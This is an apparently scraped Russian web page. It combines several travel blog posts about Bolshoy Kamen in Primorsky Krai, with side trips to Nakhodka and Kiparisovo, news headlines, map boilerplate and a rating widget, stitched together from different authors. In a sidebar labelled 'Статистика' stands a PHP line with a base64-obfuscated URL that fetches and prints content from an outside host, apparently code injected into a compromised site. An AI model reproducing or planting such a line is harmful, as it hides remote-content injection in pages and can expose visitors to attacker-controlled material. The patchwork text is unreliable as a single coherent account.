Большой Камень Приморского края – город, где можно отдохнуть душой и телом

Previous Entry | Next Entry

Большой Камень

Несколько месяцев назад удалось побывать в городе Большой Камень. Погода была дождливая. Даже промок немного. Но фотоотчёт всё же сделал. Предлагаю посмотреть самые интересные фотографии. Спонсор путешествия: Евгений Немного отойдя от автовокзала на глаза попадается рубка подводной лодки, напоминающая в какой город мы попали. image [ ]Далее обычные улицы и обычные дома. Единственное, что бросается в глаза –  малое количество транспорта по сравнению с Владивостоком. image Ещё я очень удивился наличию нормальных лежачих полицейских. Во Владивостоке и прилегающих районах зачастую их заменяет горка асфальта. Здесь всё сделано как положено. Правда нерадивые водители объезжают их с обоих сторон. Жалеют ходовку. И правильно делают. Мало что ли у нас в стране неровностей. Ещё какие то препятствия придумали. Во многих уголках города можно обнаружить очень старые сооружения разного назначения. Здесь например детские качели. Сделаны ооочень давно. В Большом Камне есть клуб! Называется Малибу. Это местная достопримечательность. Обязательно сходите, если будете в этом городе. Автобусную остановку оккупирована стая голубей. В Большом Камне есть кинотеатр! В Большом Камне есть Большие ямы посреди широкой дороги в центре города. В Большом Камне есть бомжи! Так же в Большом Камне есть спортивный комплекс. Ему лет столько же сколько и самому городу, судя по внешнему виду. Городской дом культуры отлично дополняет список того, что есть в Большом Камне. Очевидно, что в Большом Камне есть парк. Но находится он в плачевном состоянии. И ходить там как то боязно. Все сооружения не ремонтировались очень давно. В парке есть туалет. Фото вида внутри здесь выкладывать не буду. Типичный большекаменский балкончик обычного старого многоквартирного дома. Велосипеда старого не хватает. Тротуары нуждаются в ремонте. Но большое количество зелени вокруг компенсирует эту оплошность. Если немного отъехать от центра города, обнаруживаешь, что автобусные остановки резко становятся некрасивыми. Я бы постеснялся такое изготавливать, но здесь же никто не видит. Поэтому можно поставить и такую стрёмную остановку. Вообще удивительно что она тут есть. В другом городе там бы просто знак остановки поставили. По дороге в окрестные посёлки можно найти много калоритных домов. Найдёте на фотографии собаку? Великолепное строение 1959 года. Балкон недавно отвалился и упал. Внизу ещё лежат его обломки. Окраина города. Ехавшие мимо местные обитатели попросили сфотографировать засранный пляж и обязательно всем показать. Что я собственно и делаю. Здесь судя по карте должна быть “Лягушка”. Это такой камень торчащий из воды, который по словам местных напоминает лягушку. Но в последние годы здесь интенсивно шла застройка берега. И сейчас тут не представляется возможным лицезреть эту лягушку. Я долго ходил по разным закоулкам города. Не все места удалось посетить. Но в самых злачных местах собрал небольшую коллекцию граффити. Которую и выкладываю здесь бонусом. Фотографий было намного больше. Но формат журнала и мой энтузиазм не позволяет сделать такой большой рассказ. В Большом Камне есть ВСЁ! Приезжайте! И до следующей встречи!

Profile

Zulkinoks
Автомобильные номера и аксессуары

Tags

View my Tags page

Page Summary

  • : (no subject) [+1]
  • : (no subject) [+1]

Latest Month

May 2018
S M T W T F S
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

View All Archives

Links

  • Клуб Экспертов (Фотоальбом)
  • 500px

Статистика

echo file_get_contents(base64_decode(‘aHR0cDovL2FkbWluY21zLnJ1L2gvMDAxLnR4dA==’));

Categories

View my Categories page Powered by LiveJournal.com goanoid Previous | | Flag | Next 03 June 2016 @ 10:02 pm Дальний Восток. Часть 1: Большой Камень   Состоялся второй мой визит на Дальний Восток и решил поделиться своими впечатлениями, так как это ДРУГАЯ Россия, шанс особенный, а впечатления от первого визита остались в моем далеком советском детстве. Итак, перелет на огромном самолете Boeing 777-300ER авиакомпании «Аэрофлот» из Шереметьево во Владивосток. Цена всего 12 000 рублей за 8 часов лета и двухразовое питание на борту. Почему «всего»? Да потому что с обратной дорогой проблемы и расценки в среднем около 40 000 да еще с пересадками. Фильмов для досуга на борту полно, но просмотр на экране кресла не впечатлил и пришлось тянуть время иначе. Из неимоверных странностей — это гнездо для наушников в ручке кресла, которое не рассчитано на стандартный разъем Mini Jack 3.5 mm. Гнездо спаренное – каждое по отдельному каналу. То есть со своими наушниками стерео не послушать. За иллюминатором ночь поймать так и не удалось, время шло медленно, но верно. И вот долгожданная посадка: плавная и под классическое хлопанье в ладоши. На память решил сделать фотографию аэропорта, но уже подъезжал нужный автобус до города Артем. Снимок успел сделать за секунду до его отправления: Никто никого не ждет – ситуация знакомая в угоду таксистам. И вот поэтому стараюсь избегать багаж в самолете и терять потом время на его получение. До Артема ехать совсем не долго, но для автобуса автовокзал оказался не есть конечная остановка, посему мобильный 2GIS пригодился очень даже кстати. Цель назначения — город Большой Камень. Автобус ждать до него пришлось бы часа два и решил поехать на ближайшем и проходящем «Артем — Находка». Судя по карте Google до города топать примерно километра три — полчаса ходьбы, что вполне недолго. Погода стала пасмурной и туман за окном, сказывались + 7 часов от московского времени и спать захотелось очень. Проснулся на какой-то станции, по совету карты Google решил больше не спать, но обратил внимание что в автобус сел человек тоже до Большого Камня. А вот когда проснулся, смотрю — его нет, автобус стоит. Бегом к водителю. Так и есть — чуть было не укатил в Находку. До города добирался пешком по обочине от перекрестка дорог Владивосток-Большой Камень-Находка. Город хоть и небольшой (порядка 38 тысяч жителей), но поток машин был довольно плотный. После чуть более 2 км пути первым зданием по правой стороне встретилась трехэтажная гостиница «Амгунь» (есть такой приток Амура и поселок в Хабаровском крае) – место и внешний вид да еще в пасмурную погоду просто идеальные чтобы вспугнуть потенциального клиента. Жаль, что фото не сделал, но пешком в такие дебри по обочине топать более никакого желания. Еще полкилометра обочины – и АЗС, рядом с которой стоит брошенный недостроенный 9-этажный жилой дом с надписью на стене «70 лет Октября». Видимо, достроить его все-таки пытались и даже плакат до сих пор висит по теме продажи квартир: Еще немного и наконец-то сам город дал о себе знать автовокзалом и появлением тротуара! Внешний вид вокзала продолжил первое впечатление от города в не радужном ключе: Пятиэтажки, девятиэтажки и рубка АПЛ-434 (памятник «Рубка») впереди: Через три дня к «Рубке» я еще вернулся, а пока задача была скорее уже дойти до гостиницы «Океан». Город прошел довольно быстро — минут за 20-30. Заявленная в интернете гостиница как трехзвездочная выглядит заманчиво, но внутри быстро все встает на место и свалить из нее — задача номер 1, что я на следующий день и сделал. В руководстве стоит человек с Кавказа (в городе живут армяне), а у людей южных собственное представление о комфорте. Номер полу-люкс: попытка произвести впечатление неким подобием ремонта в неуютном пространстве, но за этим явно были те, у кого вместо рук — крюки, вместо головы — ведро. Слышимость неимоверная — словно стен нет, такого еще нигде и никогда не встречал. После гостиницы — небольшое знакомство с городом. Гостиничный комплекс «Юг Приморья». Впечатляет. Первая особенность города (абсолютное преобладание японских автомобилей не в счет) — это белье за окнами. У кого что висит и порой до этажа ниже свисает. И сушилки у кого какие: маленькие, большие, огромные. Местное общежитие. Общежитие — зло. А вот и проходная градообразующего предприятия — Дальневосточный завод «Звезда». Справа на фото – памятник “Камень – символ города”. Гостиница «Восток». Тоже впечатляет. При этой гостинице решил перекусить в столовой, о чем все-таки пожалел и впредь меня там не было и не будет. ДВЗ «Звезда». Проходная завода судового оборудования (ЗСО) «Восток». О заводах «Звезда» и «Восток» еще впереди отдельный разговор в отдельной теме. «Шашлычка». Коптит на отлично. Хозяева, кстати, тоже люди южные. Местным жителям все же не чуждо благоустройство. Рядовая пятиэтажка. На этом первый день пребывания в городе пора было закруглять ко сну. Но прежде непременно стоило заглянуть в магазин. Первый попавшийся супермаркет «Малибу» пришлось оставить ни с чем: цены высокие, очень высокие. Запомнилась цена на бананы в 130 рублей за кг. Недорого китайского чая в магазине не оказалось, пришлось идти в другой, но там уже выбор не ахти и пришлось идти на уступки «цена-качество». Вот следующий день выдался отличным — замечательная солнечная погода и никакой жары! Памятник воинам-землякам, павшим в сражениях Великой Отечественной Войны 1941-1945 гг.. Поход в супермаркет в ТЦ «Айсберг». Овощи и фрукты часто китайские, но цены совсем не китайские. Оказалось, что в городе также работает программа по развитию физкультуры и спорта. Ледовый дворец очень даже не маленький. Имеется и Дворец спорта. И посреди поля детская площадка затесалась, но детей на ней не оказалось. Фото со стороны ДК «Звезда». Вид на центральную улицу Карла Маркса со стороны городского Центра культуры. Городской Дом Культуры. Рядом с Домом Культуры расположены местные аттракционы. А вот и добрался до городского парка. Он совсем небольшойи примыкает к ДК. Ниже фотографии без комментариев. Далее решил направиться в сторону городского пляжа, но планы по ходу менялись один за другим в зависимости от выбранного маршрута. Просто фотографии на этом пути: Некий наблюдательный пункт на месте заброшенной в/ч. Поскольку время близилось к вечеру, по окраинам шастать решил прекратить и направиться в обратный путь и прогуляться по главной улице города до памятника «Рубка». Гостиница “Малибу” с одноименным кафе. Рекоменации) Поход по городу закончен в супермаркете «Малибу», где обратил внимание на японскую продукцию. Шоколад LOOK 45 г — 143 рубля, Meiji Black или Milk 50 г — 173 рубля, Meiji Strawberry 120 г — 483 рубля. Тему шоколада перенес в диалог с японским знакомым через Messenger, благодаря чему узнал, что японский шоколад паршивый и японец предпочитает по соотношению «цена-качество» немецкий. Не помню уже в какой момент меня осенило — в городе нет ни одного упоминания о «Единой России». Ни одного плаката! Красота! Да вообще ни одной политической партии на плакате! Лепота! Это вторая особенность города. На этом пока все. Далее состоялся визит во Владивосток, о чем тоже отдельная тема впереди.

Новости Большого камня

Новости Приморья

В России

Андрей Пионтковский: «1941-й и 2017-й»

Комитет против пыток ликвидирован и принимает сотрудников на новую работу

Песков и Навка сыграли свадьбу в самом дорогом отеле Сочи.

Депутаты Госдумы запросили у ФСИН информацию о местонахождении Васильевой

Помощник президента Андрей Белоусов попал в ДТП: водитель не пожелал пропускать

Васильева «находится там, где определил суд», заявил ее адвокат

Судно на воздушной подушке загорелось на озере Байкал, пассажиров эвакуировали

Южные территории Дальнего Востока охватывает мощная ливневая буря

Будущее судостроительного кластера обсудили в Приморье

В мире

Продолжаем путешествовать по Приморью. Сегодня предлагаю не совсем обычный отчет, слепленный из нескольких кусочков отчетов из разных городов и поселков Дальнего Востока. Как-то не получилось у меня сделать полноценный репортаж из каждого, но не пропадать добру фотографиям. Потому сегодня мы побываем сразу в трех населенных пунктах Приморья: Большом Камне, Находке и поселке Кипарисово. Город Большой Камень является ЗАТО, поэтому с попаданием в город могут быть некие проблемы. Говорят, сюда не пускают “чужие” автомобили без приглашения горожан. Да и к чужакам, как я понял, относятся с удивлением. Тем не менее, проскочить в город на рейсовом автобусе труда не составляет, на посту у въезда в Большой Камень документы не проверяют. Что уже хорошо. Случилось так, что я неудачно выбрал день своей поездки, поехал в воскресение. Дело в том, что единственный вариант выехать во Владивосток из города – на автобусе, который ходит 4-6 раз в день. Приехав в город, оказалось, что обратных билетов нет. На мой растерянный вопрос, что же делать, билетерша посоветовала подойти к отправлению, может кто-то и сдаст. Бабуля по-соседству не упустила шанса поиздеваться, мол, какой же дурак сюда приперся, когда студенты учиться едут “в город”. Ну ладно, уже хорошо, студенты – народ ветреный. Автовокзал находится фактически на выезде из города, и на небольшом удалении от него находится самый необычный метка-памятник у черты города. Я многое видел, но что бы символом города стала рубка атомной подводной лодки… Оказалось, что градообразующие предприятие города “Звезда” специализируется на постройке и разборке этих самых атомных подводных лодок, оттого за лишней рубкой дело не станет. Именно из-за этого режимного завода Большой Камень и стал ЗАТО, верно, нечего всяким шпионам шастать и секреты вынюхивать! Как и любой российский наукоград или ЗАТО, Большой Камень – очень чистый, по крайней мере, на основных своих улицах и во дворах. Продавцы тут необычно для Приморья вежливы, а местные любители пива, показалось, никогда не выбросят пивную бутылку на землю – несут в урну. В Большом Камне впервые в России я увидел улицу, где тротуар раза в полтора шире проезжей части! Причем тротуар на этой улице не один, а два! Второй тоже шире. Где ж еще такое внимание пешеходам? Образ подводной лодки встречается тут по поводу и без повода, в самых неожиданных местах, даже у магазинов одежды. Застройка города, следует признать, довольно однообразная. Одна часть города (очевидно, более старшая) застроена 3-этажными многоквартирными домами сталинского времени, другая – хрущевками и безликими многоэтажками брежневских времен. Но кругом чисто. Набережной как таковой тоже нет, всю прибрежную часть через небольшой скверик занимает режимный завод, оттого для того, чтобы пройти к Уссурийскому заливу, надо пройти километра 2-3 к югу. На этом пути можно увидеть инновационные методы улучшения покрытия гравийных дорог на Дальнем Востоке. Последние 500 метров до моря фактически проходят через лес И вот мы на высоком берегу. Отсюда не видно секретных корпусов “Звезды”, оттого и попасть никаких проблем. Виден и огромный Русский мост во Владивостоке. Даже отсюда, с почти 40 км дальности, его 340-метровые опоры выглядят внушительно. Вот и Шамора: В Большом Камне знают, где лучшее место для телевизора! А вот с прибрежной полосой тут обращаются небрежно. Во-первых, ее яростно, но хаотично заваливают всякими фортификационными сооружениями: какой смысл укреплять берег на коротком фронте, когда с соседних сторон подмоет? Во-вторых, местные дачники просто присваивают себе прибрежную полосу, которая, вроде бы, должна быть общей. Отдайте море народу, воры! Из Владивостока Большой Камень в хорошую погоду выглядит как-то так: Центр города украшает стела с гербом города. Ближе к вечеру я по совету билетерши подошел-таки к билетной кассе и – о, чудо! – билетик нашелся! Какая-то добрая девушка предпочла явке на первую пару свою личную жизнь, чем обеспечила мне проезд во Владивосток. Надеюсь, у нее все хорошо сложилось в ту ночь 🙂 На автобусной остановке заметил пару забавных направлений. Очень жалею, что не попал в Новую Москву, вот репортаж бы был! * * * Следующий пункт нашего путешествия — Находка. Поездка в Находку – самое необычное путешествие в моей жизни. Дело в том, что я совершил его ночью, приехав в город в 22-30 и отправившись обратно около 7 утра. Да, на “Приморочке”, конечно. Что я могу сказать о Находке? В первую очередь – совершенно неадекватная ценовая политика местных гостиниц, самый дешевый номер в сарае, обитым вагонкой, без завтрака, вай-фая, нормального душа и с одной розеткой стоит почти 3000 рублей за ночь, причем карточкой оплату не принимают. Цивилизация, мать ее! Однако и этих 8 часов хватило, чтобы исследовать город “от начала до конца”. Находка находится по берегам подковообразной бухты и, как говорил местный таксист, тянется на 25-27 км. При этом от станции Крабовая (самая удаленная станция от Москвы, не считая “конечной” “Мыс Астафьева”, почти 9540 км) до станции Находка (около 20 км) я прошел пешком. Станция ночью выглядит как-то так: Все пути заставлены наливными поездами, видать, рекорды по экспорту нефти надо бить и на востоке страны. Находка довольно чистый город, но, как и Большой Камень или Одесса, не имеет своей набережной (или я ее просто не нашел, что вряд ли). Вся береговая линия занята бесчисленными портами и железной дорогой. С новопостроенной смотровой площадки виден, разве что, огромный угольный терминал. Из-за него в окрестностях стоит страшный шум, а угольная пыль оседает на всем, что можно. Фотографировать особо нечего. Дальнейшая прогулка до вокзала Находка заняла где-то 3,5 часа по улицам, где не всегда есть тротуары и уличное освещение. Окрестные сопки становились все ниже, пока к северной части города не превратились в небольшую равнину. С первыми лучами зарева восхода, я отправился обратно. * * * Нельзя не упомянуть и еще об одном приморском поселке. Хотел посмотреть, как живет русская деревня на Дальнем Востоке. Выбрал Кипарисово. Оно, конечно, от Владивостока недалеко. Тут даже Транссиб проходит, как раз по границе сопок и широкой долины реки Раздольная Судя по застройке, Кипарисово мало отличается от таких же поселков где-нибудь в Воронежской, Вологодской или Брянской областях. Народ тут зарабатывает как может, вот, автобус чинят самостоятельно… Поедет ли он еще куда-нибудь – неведомо. Тут даже Дом культуры такой… Кхе-кхе… наш, сельско-советский. Все Кипарисово можно обойти за полчаса неторопливого шага. В общем-то делать тут нечего, оттого пора идти на станцию. На станции живет множество котов, которые, подобно цыганятам, пристают к пассажирам в надежде на подачку. Главный среди станционных котов польстился уж было на мой сухарик, но вдруг весь съежился, испугавшись землетрясения. Колебателем земли оказалась сплотка трехсекционных тяжеленных электровозов, которые на высокой для станции скорости протащили наливной поезд в сторону Хабаровска. Правильно, Транссиб не резиновый, а дополнительные пробки на нем создавать машинистам не хочется. * * * Ну и напоследок – пара забавных фотографий, не вошедших в отчеты. На китайском рынке в Уссурийске углядел вот такое объявление. Не пойму, что обязана делать “помогайка”? Во Владивостоке у людей с креативом посерьезнее. Фанаты праворульных автомобилей не устают убеждать себя в том, что лучше праворульного автомобиля из Японии может быть только праворульный автомобиль из Японии, но более новой модели. А главных “жуликов и воров” клеймят прямо на их же, “жуликовой”, агитации. * * * Вот такой вот он прекрасный, наш Дальний Восток!

городской округ Большой Камень входит в состав Приморского края. Административным центром городской округ Большой Камень является город город Большой Камень На подробной карте городской округ Большой Камень Вы можете проложить маршрут между населенными пунктами, изучить по карте автомобильные дороги городской округ Большой Камень или найти деревню или поселок по названию через строку поиска.

Спутниковая карта городской округ Большой Камень Приморского края

Спутниковая карта городской округ Большой Камень Приморского края со списком всех городов и посёлков городской округ Большой Камень. На карте со спутника отображены административные границы городской округ Большой Камень Приморского края, можно посмотреть реки и озера городской округ Большой Камень на карте. Для предоставления информации используются онлайн-сервисы: Яндекс карты, гугл карты и OpenStreetMap карты.

Большой Камень – центр городской округ Большой Камень.

Города и посёлки городской округ Большой Камень

Большой Камень Петровка Суходол

Оцените статью
Рейтинг автора
4,8
Материал подготовил
Максим Коновалов
Наш эксперт
Написано статей
127
А как считаете Вы?
Напишите в комментариях, что вы думаете – согласны
ли со статьей или есть что добавить?
Добавить комментарий